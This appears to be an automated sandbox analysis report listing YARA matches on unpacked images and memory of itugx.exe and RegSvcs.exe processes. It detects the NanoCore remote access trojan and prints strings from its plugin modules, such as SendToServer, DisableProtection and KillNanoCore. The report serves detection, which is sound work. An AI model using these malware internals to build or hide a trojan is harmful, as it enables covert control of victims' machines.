      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: itugx.exeBinary or memory string: WIN_81
      Source: itugx.exeBinary or memory string: WIN_XP
      Source: itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: itugx.exeBinary or memory string: WIN_XPe
      Source: itugx.exeBinary or memory string: WIN_VISTA
      Source: itugx.exeBinary or memory string: WIN_7
      Source: itugx.exeBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
